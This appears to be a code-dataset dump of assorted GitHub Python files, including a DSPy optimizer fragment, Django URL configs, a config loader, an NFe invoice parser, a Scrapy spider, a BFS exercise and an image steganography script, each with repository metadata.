{len(augmented_demos)} augmented demos and {len(raw_demos)} raw demos.')\n predictor.demos = augmented_demos + raw_demos\n \n evaluate = Evaluate(devset=self.validation, metric=self.metric, num_threads=self.num_threads, display_table=False, display_progress=True)\n score = evaluate(program)\n\n print('Score:', score, 'for set:', [len(predictor.demos) for predictor in program.predictors()])\n # dsp.settings.lm.inspect_history(n=1)\n\n return (score, program)\n\n def _train(self):\n for name, predictor in self.student.named_predictors():\n predictor.traces = self.name2traces[name]\n pass\n\n self.candidate_sets = []\n\n for candidate_set_idx in range(self.num_candidate_sets):\n score, program = self._random_search_instance(candidate_set_idx)\n self.candidate_sets.append((score, program))\n \n best_score, best_program = max(self.candidate_sets, key=lambda x: x[0])\n print('Best score:', best_score)\n\n return best_program\n\n\n\n\n# sample between 4 and 10 examples from traces\n# TODO: FIXME: The max number of demos should be determined in part by the LM's tokenizer + max_length.\n# This does require excecuting the program, or at least the predictor.\n# # # # # # (Actually we can just combine the token counts of the traces, when formatted via signature/adapter).\n# Alternatively, we can keep track of the (zero-shot) number of tokens when we bootstrap.\n# As another option, we can just try a wide range and handle failures as penalties on the score.\n# The number \"24\" of traces to collect can also be affected. If we only need 3x10, some overlap is ok.\n# We can also consider having short_demos and long_demos.\n", "repo_name": "son1128/dspy", "sub_path": "dspy/teleprompt/random_search.py", "file_name": "random_search.py", "file_ext": "py", "file_size_in_byte": 5886, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "bootstrap.BootstrapFewShot", "line_number": 35, "usage_type": "name"}, {"api_name": "random.Random", "line_number": 64, "usage_type": "call"}, {"api_name": "dspy.evaluate.evaluate.Evaluate", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "13674400999", "text": "import json\nimport os\nimport sys\n\n# list files in a directory\ndef list_files(path):\n list = []\n\n for (root, dirs, files) in os.walk(path):\n for f in files:\n list.append((root[2:] + \"/\" + f).replace('\\\\','/'))\n\n return list\n\n# get size of all files in a directory\ndef dir_size(path):\n total = 0\n\n for (root, dirs, files) in os.walk(path):\n for f in files:\n total += os.path.getsize(root + \"/\" + f)\n\n return total\n\n# get the version of an application at the provided path\ndef get_version(path, is_lib = False):\n ver = \"\"\n string = \".version = \\\"\"\n\n if not is_lib:\n string = \"_VERSION = \\\"\"\n\n f = open(path, \"r\")\n\n for line in f:\n pos = line.find(string)\n if pos >= 0:\n ver = line[(pos + len(string)):(len(line) - 2)]\n break\n\n f.close()\n\n return ver\n\n# generate installation manifest object\ndef make_manifest(size):\n manifest = {\n \"versions\" : {\n \"installer\" : get_version(\"./ccmsi.lua\"),\n \"bootloader\" : get_version(\"./startup.lua\"),\n \"common\" : get_version(\"./scada-common/util.lua\", True),\n \"comms\" : get_version(\"./scada-common/comms.lua\", True),\n \"graphics\" : get_version(\"./graphics/core.lua\", True),\n \"lockbox\" : get_version(\"./lockbox/init.lua\", True),\n \"reactor-plc\" : get_version(\"./reactor-plc/startup.lua\"),\n \"rtu\" : get_version(\"./rtu/startup.lua\"),\n \"supervisor\" : get_version(\"./supervisor/startup.lua\"),\n \"coordinator\" : get_version(\"./coordinator/startup.lua\"),\n \"pocket\" : get_version(\"./pocket/startup.lua\")\n },\n \"files\" : {\n # common files\n \"system\" : [ \"initenv.lua\", \"startup.lua\", \"configure.lua\", \"LICENSE\" ],\n \"common\" : list_files(\"./scada-common\"),\n \"graphics\" : list_files(\"./graphics\"),\n \"lockbox\" : list_files(\"./lockbox\"),\n # platform files\n \"reactor-plc\" : list_files(\"./reactor-plc\"),\n \"rtu\" : list_files(\"./rtu\"),\n \"supervisor\" : list_files(\"./supervisor\"),\n \"coordinator\" : list_files(\"./coordinator\"),\n \"pocket\" : list_files(\"./pocket\"),\n },\n \"depends\" : {\n \"reactor-plc\" : [ \"system\", \"common\", \"graphics\", \"lockbox\" ],\n \"rtu\" : [ \"system\", \"common\", \"graphics\", \"lockbox\" ],\n \"supervisor\" : [ \"system\", \"common\", \"graphics\", \"lockbox\" ],\n \"coordinator\" : [ \"system\", \"common\", \"graphics\", \"lockbox\" ],\n \"pocket\" : [ \"system\", \"common\", \"graphics\", \"lockbox\" ]\n },\n \"sizes\" : {\n # manifest file estimate\n \"manifest\" : size,\n # common files\n \"system\" : os.path.getsize(\"initenv.lua\") + os.path.getsize(\"startup.lua\") + os.path.getsize(\"configure.lua\"),\n \"common\" : dir_size(\"./scada-common\"),\n \"graphics\" : dir_size(\"./graphics\"),\n \"lockbox\" : dir_size(\"./lockbox\"),\n # platform files\n \"reactor-plc\" : dir_size(\"./reactor-plc\"),\n \"rtu\" : dir_size(\"./rtu\"),\n \"supervisor\" : dir_size(\"./supervisor\"),\n \"coordinator\" : dir_size(\"./coordinator\"),\n \"pocket\" : dir_size(\"./pocket\"),\n }\n }\n\n return manifest\n\n# write initial manifest with placeholder size\nf = open(\"install_manifest.json\", \"w\")\njson.dump(make_manifest(\"-----\"), f)\nf.close()\n\nmanifest_size = os.path.getsize(\"install_manifest.json\")\n\nfinal_manifest = make_manifest(manifest_size)\n\n# calculate file size then regenerate with embedded size\nf = open(\"install_manifest.json\", \"w\")\njson.dump(final_manifest, f)\nf.close()\n\nif len(sys.argv) > 1 and sys.argv[1] == \"shields\":\n # write all the JSON files for shields.io\n for key, version in final_manifest[\"versions\"].items():\n f = open(\"./deploy/\" + key + \".json\", \"w\")\n\n if version.find(\"alpha\") >= 0:\n color = \"yellow\"\n elif version.find(\"beta\") >= 0:\n color = \"orange\"\n else:\n color = \"blue\"\n\n json.dump({\n \"schemaVersion\": 1,\n \"label\": key,\n \"message\": \"\" + version,\n \"color\": color\n }, f)\n\n f.close()\n", "repo_name": "MikaylaFischler/cc-mek-scada", "sub_path": "imgen.py", "file_name": "imgen.py", "file_ext": "py", "file_size_in_byte": 4296, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 85, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.walk", "line_number": 9, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.getsize", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.getsize", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path.getsize", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path", "line_number": 105, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 111, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 114, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 126, "usage_type": "call"}]} +{"seq_id": "73754767206", "text": "from os import path\nfrom setuptools import setup\n\nwith open(path.join(path.dirname(path.abspath(__file__)), 'README.rst')) as f:\n readme = f.read()\n\nsetup(\n name = 'metadata_burn',\n version = '0.1',\n description = 'An app to add metadata to a PNG image',\n long_description = readme,\n author = 'John Pastore',\n author_email = 'dev@babyMRI.org',\n url = 'http://wiki',\n packages = ['metadata_burn'],\n install_requires = ['chrisapp'],\n test_suite = 'nose.collector',\n tests_require = ['nose'],\n license = 'MIT',\n zip_safe = False,\n python_requires = '>=3.6',\n entry_points = {\n 'console_scripts': [\n 'metadata_burn = metadata_burn.__main__:main'\n ]\n }\n)\n", "repo_name": "FNNDSC/pl-metadata-burn", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 826, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 4, "usage_type": "call"}, {"api_name": "os.path", "line_number": 4, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 4, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 4, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "28597585058", "text": "from django.urls import path, re_path\nfrom .views import *\n\nurlpatterns = [\n path('', Home.as_view(), name='home'),\n path('about/', about, name='about'),\n path('add_page/', add_page, name='add_product'),\n path('contact/', contact, name='contact'),\n path('login/', LoginUser.as_view(), name='login'),\n path('logout/', logout_user, name='logout'),\n path('register/', RegisterUser.as_view(), name='register'),\n path('product/', show_prod.as_view(), name='prod'),\n path('category/', Category.as_view(), name='category'),\n]", "repo_name": "grustniyebalnik/djlast", "sub_path": "coolsite/equipment/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 576, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "30768100331", "text": "# -*- coding: utf-8 -*-\n\nfrom backports import configparser\n# from bs4 import BeautifulSoup\nimport xmltodict\nimport json\nimport yaml\n\nimport os\n\n__version__ = \"0.0.1\"\n__all__ = ['load']\n\nclass Loader(object):\n # TODO: load from other sources like, remote http, ssh, stream\n def getFileContent(self, file_path):\n content = None\n if not os.path.isfile(file_path):\n raise Exception(\"{} not found\".format(file_path))\n with open(file_path) as _input:\n content =_input.read()\n return content\n\nclass Config(object):\n\n def __init__(self):\n pass\n\nclass Configurator(object):\n required = set()\n def __init__(self, configFile, _format, required=[], keysMapping={}):\n self.configFile = configFile\n self.format = _format\n self.configObj = None\n self.loaderObj = Loader()\n self.required = set(required)\n self.__mappedKeys = keysMapping\n\n def getConfigDict(self):\n if self.format == \"json\":\n self.configObj = self.__parseJson()\n elif self.format == \"yaml\":\n self.configObj = self.__parseYaml()\n elif self.format == \"ini\":\n self.configObj = self.__parseIni()\n elif self.format == \"xml\":\n self.configObj = self.__parseXml()\n else:\n raise Exception(\"Not valid format\")\n return self.configObj\n\n def getConfigObj(self):\n configObj = Config()\n self.getConfigDict()\n for k,v in self.configObj.items():\n setattr(configObj,k,v)\n return configObj\n\n def __parseIni(self):\n conf = configparser.ConfigParser()\n conf.read(self.configFile)\n return self.__processIni(conf)\n\n def __parseJson(self):\n content = self.loaderObj.getFileContent(self.configFile)\n conf = json.loads(content)\n return conf\n\n def __parseXml(self):\n content = self.loaderObj.getFileContent(self.configFile)\n conf = xmltodict.parse(content)\n return conf\n\n def __parseYaml(self):\n content = self.loaderObj.getFileContent(self.configFile)\n conf = yaml.load(content, Loader=yaml.FullLoader)\n return conf\n\n def __processIni(self, conf):\n result = {}\n validating_sections = list(self.required.difference(set(conf.sections())))\n if not validating_sections:\n for section in conf.sections():\n # print \"Section : \",section\n result[section] = dict(conf.items(section))\n if section in self.__mappedKeys:\n for item in self.__mappedKeys[section]:\n _key = item[\"key\"]\n if conf.has_option(section,_key):\n result[section][_key] = item[\"mapping\"](conf.get(section,_key))\n # setattr(result, section.upper(), item[\"mapping\"](conf.get(section,_key)))\n continue\n \n # setattr(result,section,dict(conf.items(section)))\n else:\n raise AttributeError('Some sections are missing', *sections)\n return result\n\n\ndef load(file_path,type_file, mapping, asDict=True):\n # TODO: Make all the params and return always a dict or custum dict like object\n configuration = Configurator(file_path,type_file,keysMapping=mapping)\n if asDict:\n return configuration.getConfigDict()\n return configuration.getConfigObj()", "repo_name": "Al3jandr032/statuto", "sub_path": "statuto/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 3458, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.isfile", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "backports.configparser.ConfigParser", "line_number": 60, "usage_type": "call"}, {"api_name": "backports.configparser", "line_number": 60, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 66, "usage_type": "call"}, {"api_name": "xmltodict.parse", "line_number": 71, "usage_type": "call"}, {"api_name": "yaml.load", "line_number": 76, "usage_type": "call"}, {"api_name": "yaml.FullLoader", "line_number": 76, "usage_type": "attribute"}]} +{"seq_id": "38276799543", "text": "from datetime import date\nimport xml.etree.ElementTree as ET\n\ndef elem(tree, *children, **kwargs):\n ns = \"{%s}\" % kwargs.get('ns', \"http://www.portalfiscal.inf.br/nfe\")\n return tree.find('/'.join([\"%s%s\" % (ns, child) for child in children]))\n\ndef iterelem(tree, *children, **kwargs):\n ns = \"{%s}\" % kwargs.get('ns', \"http://www.portalfiscal.inf.br/nfe\")\n return tree.iterfind('/'.join([\"%s%s\" % (ns, child) for child in children]))\n\n\ndef parse_nfe_document(filename):\n doc = {}\n\n tree = ET.parse(filename)\n xinfNFe = elem(tree, \"NFe\", \"infNFe\")\n\n version = float(xinfNFe.get(\"versao\"))\n f = {'id': \"ide\", 'number': \"nNF\", 'date': \"dhEmi\",\n 'sup': \"emit\", 'sup.cnpj': \"CNPJ\", 'sup.name': \"xNome\",\n 'detail': \"det\", 'prod': \"prod\", 'prod.name': \"xProd\",\n 'prod.qnt': \"qCom\"}\n if version == 3.1:\n pass\n elif version == 2.0:\n f.update({'date': \"dEmi\"})\n\n xid = elem(xinfNFe, f['id'])\n doc['number'] = int(elem(xid, f['number']).text)\n doc['date'] = date(*map(int, elem(xid, f['date']).text[0:10].split('-')))\n\n xsup = elem(xinfNFe, f['sup'])\n doc['supplier.cnpj'] = elem(xsup, f['sup.cnpj']).text\n doc['supplier.name'] = elem(xsup, f['sup.name']).text\n\n doc['products'] = products = []\n for xprod in iterelem(xinfNFe, f['detail'], f['prod']):\n prod = {'name': elem(xprod, f['prod.name']).text,\n 'qnt': int(float(elem(xprod, f['prod.qnt']).text))}\n products.append(prod)\n\n return doc\n", "repo_name": "wagnerluis1982/serialnumbers", "sub_path": "serialnumber/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 1507, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "xml.etree.ElementTree.parse", "line_number": 16, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 16, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "3344349083", "text": "from django.urls import path, include\nfrom rest_framework_jwt.views import obtain_jwt_token, refresh_jwt_token, verify_jwt_token\nfrom testApp.views import (\n RegisterView,\n ContactCreateAPIView,\n ContactListAPIView,\n ContactRetrieveAPIView,\n ContactUpdateAPIView,\n ContactDestroyAPIView,\n GroupAdd,\n GroupDetailView,\n GroupView,\n)\n\nurlpatterns = [\n # Login APIs\n path(\"register/\", RegisterView.as_view(), name=\"auth_register\"),\n path(\"auth-jwt/\", obtain_jwt_token),\n path(\"auth-jwt-refresh/\", refresh_jwt_token),\n path(\"auth-jwt-verify/\", verify_jwt_token),\n # Contact APIs\n path(\"create-contact/\", ContactCreateAPIView.as_view(), name=\"create-contact\"),\n path(\"contacts/\", ContactListAPIView.as_view(), name=\"list-contact\"),\n path(\"contact/\", ContactRetrieveAPIView.as_view(), name=\"retrieve-contact\"),\n path(\"update-contact/\", ContactUpdateAPIView.as_view(), name=\"update-contact\"),\n path(\"delete-contact/\", ContactDestroyAPIView.as_view(), name=\"delete-contact\"),\n # Group APIs\n path(\"group/\", GroupAdd.as_view(), name=\"create-group\"),\n path(\"group/\", GroupDetailView.as_view(), name=\"group_detail\"),\n path(\"groups/\", GroupView.as_view(), name=\"getall-group\"),\n]\n", "repo_name": "prashantboss/bizburd", "sub_path": "testApp/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1270, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "testApp.views.RegisterView.as_view", "line_number": 17, "usage_type": "call"}, {"api_name": "testApp.views.RegisterView", "line_number": 17, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "rest_framework_jwt.views.obtain_jwt_token", "line_number": 18, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "rest_framework_jwt.views.refresh_jwt_token", "line_number": 19, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}, {"api_name": "rest_framework_jwt.views.verify_jwt_token", "line_number": 20, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "testApp.views.ContactCreateAPIView.as_view", "line_number": 22, "usage_type": "call"}, {"api_name": "testApp.views.ContactCreateAPIView", "line_number": 22, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "testApp.views.ContactListAPIView.as_view", "line_number": 23, "usage_type": "call"}, {"api_name": "testApp.views.ContactListAPIView", "line_number": 23, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 24, "usage_type": "call"}, {"api_name": "testApp.views.ContactRetrieveAPIView.as_view", "line_number": 24, "usage_type": "call"}, {"api_name": "testApp.views.ContactRetrieveAPIView", "line_number": 24, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "testApp.views.ContactUpdateAPIView.as_view", "line_number": 25, "usage_type": "call"}, {"api_name": "testApp.views.ContactUpdateAPIView", "line_number": 25, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 26, "usage_type": "call"}, {"api_name": "testApp.views.ContactDestroyAPIView.as_view", "line_number": 26, "usage_type": "call"}, {"api_name": "testApp.views.ContactDestroyAPIView", "line_number": 26, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 28, "usage_type": "call"}, {"api_name": "testApp.views.GroupAdd.as_view", "line_number": 28, "usage_type": "call"}, {"api_name": "testApp.views.GroupAdd", "line_number": 28, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 29, "usage_type": "call"}, {"api_name": "testApp.views.GroupDetailView.as_view", "line_number": 29, "usage_type": "call"}, {"api_name": "testApp.views.GroupDetailView", "line_number": 29, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 30, "usage_type": "call"}, {"api_name": "testApp.views.GroupView.as_view", "line_number": 30, "usage_type": "call"}, {"api_name": "testApp.views.GroupView", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "11730217130", "text": "# -*- coding: utf-8 -*-\nimport scrapy\nfrom lscarpy.items import QuotesItem\n\n\nclass QuotesSpider(scrapy.Spider):\n name = 'quotes'\n allowed_domains = ['quotes.toscrape.com']\n start_urls = ['http://quotes.toscrape.com/']\n\n def parse(self, response):\n quotes = response.css('.quote')\n item = QuotesItem()\n for quote in quotes:\n item['text'] = quote.css('.text::text').extract_first()\n item['author'] = quote.css('.author::text').extract_first()\n item['tags'] = quote.css('.tags .tag::text').extract()\n yield item\n\n next_page = response.css('.pager .next a::attr(\"href\")').extract_first()\n next_url = response.urljoin(next_page)\n if next_url is not None:\n yield response.follow(next_page, self.parse)\n", "repo_name": "nobodyLee/LearningScrapy", "sub_path": "lscarpy/lscarpy/spiders/quotes.py", "file_name": "quotes.py", "file_ext": "py", "file_size_in_byte": 805, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "scrapy.Spider", "line_number": 6, "usage_type": "attribute"}, {"api_name": "lscarpy.items.QuotesItem", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "2036917708", "text": "\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n'***************************** Jewel Mahmud *****************************'\n'***************************** CSE-13th,MBSTU *****************************'\n'***************************** Date: 13-08-2022 *****************************'\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n#problem name: Prepare>Algorithms>Graph Theory>Breadth First Search: Shortest Reach\n#problem link: https://www.hackerrank.com/challenges/bfsshortreach/problem\n\nfrom collections import defaultdict\n\nqueue = [] # Initialize a queue\ndef bfs(visited, queue, graph, root, num_of_node): # function for BFS\n visited.append(root)\n queue.append(root)\n level=[None]*(num_of_node+1)\n level[root]=0\n while queue: # Creating loop to visit each node\n m = queue.pop(0)\n # print(m, end=\" \")\n\n for neighbour in graph[m]:\n if neighbour not in visited:\n level[neighbour]=level[m]+1\n visited.append(neighbour)\n queue.append(neighbour)\n return level\n# main code \nTEST=int(input())\nfor _ in range(TEST):\n graph=defaultdict(list)\n num_of_node, num_of_edge=map(int, input().split())\n for _ in range(num_of_edge):\n u,v=map(int, input().split())\n if u not in graph[v]:\n graph[v].append(u)\n if v not in graph[u]:\n graph[u].append(v)\n root=int(input())\n # print(graph)\n visited=[]\n queue = [] # Initialize a queue\n level=bfs(visited, queue, graph, root, num_of_node)\n # print(level)\n for i in range(1,num_of_node+1):\n if i==root:\n continue\n elif level[i]==None:\n print('-1', end=' ')\n else:\n print(level[i]*6, end=' ')\n print(end='\\n')", "repo_name": "MahmudJewel/Hackerrank-my-solution", "sub_path": "Problem_solving/Graph Theory/Breadth First Search: Shortest Reach.py", "file_name": "Breadth First Search: Shortest Reach.py", "file_ext": "py", "file_size_in_byte": 1838, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "collections.defaultdict", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "41355426362", "text": "from PIL import Image\nimport os\nimport cast_function as cs\nimport seed\nimport random_seed as rs\nimport sys\nimport file_reader as fr\n\n\n\ndef HYS_encoding(image_path, message):\n # insert metadata to the image\n seed_val = seed.set_meta(image_path,rs.get_random_seed())\n\n\n new_image_path = image_path[:-4]+\"_seed.png\"\n im = Image.open(new_image_path)\n pixel_amount = im.size[0]*im.size[1]\n\n jump_list = rs.generate_random_list(int(im.text.get('Number')),pixel_amount)\n\n\n list = [0] * pixel_amount\n\n i=0\n pixel_summer=0\n\n while inumber_of_chars:\n my_str = my_str[:my_str-number_of_chars]\n #my_str = \"Hello Haiel How are you?\"\n\n my_str += \"$^$\"\n\n # print(\"my str len:\" + str(len(my_str)))\n\n my_char_place = 0 # the current index of my_str\n my_char = my_str[my_char_place] # the current char of my str the loop hides it now.\n my_bin = cs.char_to_binary(my_char) # the current char in binary 8 bits\n my_point = 0 # the current index of my bin in hiding loop.\n\n flag = 0 # flag = 0 - still hiding, flag = 1 - regular copy\n new_matrix = []\n j = -1\n\n index = 0\n\n for pixel in my_matrix_image:\n\n if my_point == 8:\n my_char_place += 1\n if my_char_place >= len(my_str):\n flag = 1\n\n if flag == 0:\n my_char = my_str[my_char_place]\n my_bin = cs.char_to_binary(my_char)\n my_point = 0\n\n new_matrix.append([])\n j += 1\n if list[index] == 1:\n for i in pixel:\n bin_i = cs.integer_to_binary(i)\n\n if flag == 0:\n if my_bin[my_point] != bin_i[7]:\n bin_i = bin_i[:7] + my_bin[my_point]\n new_matrix[j].append(int(bin_i, 2))\n else:\n new_matrix[j].append(int(bin_i, 2))\n my_point += 1\n else:\n new_matrix[j].append(int(bin_i, 2))\n\n if my_point == 8:\n my_char_place += 1\n if my_char_place < len(my_str):\n my_char = my_str[my_char_place]\n my_bin = cs.char_to_binary(my_char)\n my_point = 0\n else:\n flag = 1\n else:\n new_matrix[j] = pixel\n\n index += 1\n new_matrix[j] = tuple(new_matrix[j])\n\n new_im = Image.new(im.mode, im.size)\n new_im.putdata(new_matrix)\n new_im.save(new_image_path[:-4] + \"_temp.png\")\n\n im = seed.set_sec_meta(new_image_path[:-4] + \"_temp.png\",seed_val)\n\n try:\n\n os.remove(new_image_path[:-4]+\"_seed.png\")\n os.remove(new_image_path[:-4] + \"_temp.png\")\n except:\n pass\n return im\n# def main(image_path):\n#\n# HYS_encoding(image_path)\n#\n# main(sys.argv[1])\n\n", "repo_name": "HaielDahan/HYSecretsProject", "sub_path": "HYS_en.py", "file_name": "HYS_en.py", "file_ext": "py", "file_size_in_byte": 3408, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "seed.set_meta", "line_number": 13, "usage_type": "call"}, {"api_name": "random_seed.get_random_seed", "line_number": 13, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 17, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 17, "usage_type": "name"}, {"api_name": "random_seed.generate_random_list", "line_number": 20, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 41, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 41, "usage_type": "name"}, {"api_name": "cast_function.char_to_binary", "line_number": 56, "usage_type": "call"}, {"api_name": "cast_function.char_to_binary", "line_number": 74, "usage_type": "call"}, {"api_name": "cast_function.integer_to_binary", "line_number": 81, "usage_type": "call"}, {"api_name": "cast_function.char_to_binary", "line_number": 97, "usage_type": "call"}, {"api_name": "PIL.Image.new", "line_number": 107, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 107, "usage_type": "name"}, {"api_name": "seed.set_sec_meta", "line_number": 111, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 115, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 116, "usage_type": "call"}]} +{"seq_id": "75363056804", "text": "di={}\r\n\r\nimport json\r\n\r\ndef additem(unid,data):\r\n with open(\"fil.json\",'w') as file:\r\n di[unid] = data\r\n json.dump(di,f)\r\n return (\"success\")\r\n\r\ndef retrivedata(unid):\r\n with open(\"file.json\",\"w\") as file:\r\n if unid in di:\r\n di = json.load(f)\r\n return di\r\n raise json.decoder.JSONDecodeError(\"invalid inpur\")\r\n\r\ndef updatedata(inid,new_data):\r\n with opem(\"file.json\",\"w+\") as f:\r\n if unid in di:\r\n di[unid] = new_data\r\n json.dump(di,f)\r\n return (\"updated sucessfully\")\r\n raise json.decoder.JSONDecodeError(\"invalid operation\")\r\n\r\ndef deletedata(data,target):\r\n with open(\"file.json\",\"w+\"):\r\n if unid in di:\r\n del di[unid]\r\n return(\"deleted successfully\")\r\n raise json.decoder.JSONDecodeError\r\n\r\n\r\n\r\nwhile True:\r\n print(\"Welcome \\nto add data pres 1\\nto retrive data pres 2\\n\"\r\n \"to update data pres 3\\nto delete data pres 4\\nto quit pres 5\\n\"\r\n )\r\n\r\n if choice == '1':\r\n unid = max(di.values(), default=0)+1\r\n print(F\"your key is:{unid}\")\r\n data = input(\"enter data you want to add: \")\r\n print(additem(unid,data))\r\n if choice == '2':\r\n unid = int(input(\"enter the data id you want to retrive: \"))\r\n print(retrivedata(unid))\r\n if choice == '3':\r\n unid = int(input(\"enter the data id you want to change: \"))\r\n new_data = input(\"enter the data you wnat to update\")\r\n print(updatedata(unid,data))\r\n if choice == '4':\r\n unid = int(input(\"enter the id of the data you want to delete: \"))\r\n print(deletedata(unid))\r\n if choice == '5':\r\n print(\"exiting the program\")\r\n break", "repo_name": "vardges97/Tasks", "sub_path": "jasonoftheargonauts.py", "file_name": "jasonoftheargonauts.py", "file_ext": "py", "file_size_in_byte": 1727, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.dump", "line_number": 8, "usage_type": "call"}, {"api_name": "json.load", "line_number": 14, "usage_type": "call"}, {"api_name": "json.decoder.JSONDecodeError", "line_number": 16, "usage_type": "call"}, {"api_name": "json.decoder", "line_number": 16, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 22, "usage_type": "call"}, {"api_name": "json.decoder.JSONDecodeError", "line_number": 24, "usage_type": "call"}, {"api_name": "json.decoder", "line_number": 24, "usage_type": "attribute"}, {"api_name": "json.decoder", "line_number": 31, "usage_type": "attribute"}]} +{"seq_id": "20840464161", "text": "from django.urls import path\nfrom .views import ArticleList, ArticleDetail, CategoryList, AuthorList, ArticlePre\n\napp_name = 'blog'\nurlpatterns = [\n # default url\n path('', ArticleList.as_view(), name='home'),\n # url with page id request\n path('page/', ArticleList.as_view(), name='home'),\n path('article/', ArticleDetail.as_view(), name='detail'),\n path('preview/', ArticlePre.as_view(), name='preview'),\n # default url\n path('category/', CategoryList.as_view(), name='category'),\n # url with page id request\n path('category//page/', CategoryList.as_view(), name='category'),\n path('author/', AuthorList.as_view(), name='author'),\n path('author//page/', AuthorList.as_view(), name='author'),\n\n]\n", "repo_name": "MoriZoki/django-blog", "sub_path": "blog/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 833, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "views.ArticleList.as_view", "line_number": 7, "usage_type": "call"}, {"api_name": "views.ArticleList", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "views.ArticleList.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": 